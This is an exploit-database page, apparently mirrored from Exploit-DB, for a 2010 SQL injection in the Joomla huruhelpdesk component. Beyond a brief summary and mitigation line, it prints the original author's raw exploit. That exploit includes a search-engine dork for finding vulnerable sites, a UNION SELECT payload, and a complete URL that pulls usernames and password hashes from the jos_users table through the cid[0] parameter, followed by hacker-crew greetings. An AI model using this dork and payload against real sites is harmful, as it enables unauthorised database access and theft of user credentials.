header-logo
Suggest Exploit
vendor:
N/A
by:
bumble_be
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP 2
2010

joomla component huruhelpdesk SQL injection Vulnerability

An attacker can exploit a SQL injection vulnerability in the Joomla component huruhelpdesk to gain access to the database. The attacker can send a malicious SQL query to the vulnerable parameter cid[0] in the URL. This will allow the attacker to view the username and password of the users in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to use parameterized queries.
Source

Exploit-DB raw data:

# Exploit Title: joomla component huruhelpdesk SQL injection Vulnerability 
# Date: 09 april 2010
# Author: bumble_be
# Software Link: N/A
# Tested on: Windows XP 2

======================================================================
[x] author : bumble_be (iogi89@ymail.com)
[x] dork   : inurl:option=com_huruhelpdesk
[x] myweb  : http://linggau-haxor.com
======================================================================

==== SQLI EXPLOIT ====
/**/union/**/select/**/1,2,3,version@@,5,6,7--


==== VULN IN HERE ====

http://localhost/xampp/joomla/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1[c0de]



==== LIVE DEMO

http://localhost/xampp/joomla/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password),5,6,7+from+jos_users--


[x]-------------------------------------------------------------------

GREETZ TO WE FORUM:
DEVILZC0DE.ORG / INDONESIANHACKER.ORG / HACKER-NEWBIE.ORG / PALEMBANGHACKERLINK.ORG / YOGYACARDERLINK.WEB.ID

[x]-------------------------------------------------------------------

MY BROTHA :
mywisdom, spykid, chaer.newbie, flyff666 , revres tanur , kiddies, petimati, ketek, syntax_error, system_rt0, suddent_death,
eidelweiss , Aaezha, ichito-bandito, kamtiEz, r3m1ck, otong, 3xpL0it, bl4ck_sh4d0w, demnas, RxN and all crew indonesia hacker :)

[x]-------------------------------------------------------------------

note :mulailah sesuatu dengan ucapan bissmillah

[X]-------------------------------------------------------------------
INDONESIA STILL UP AND WE NOT DEAD :0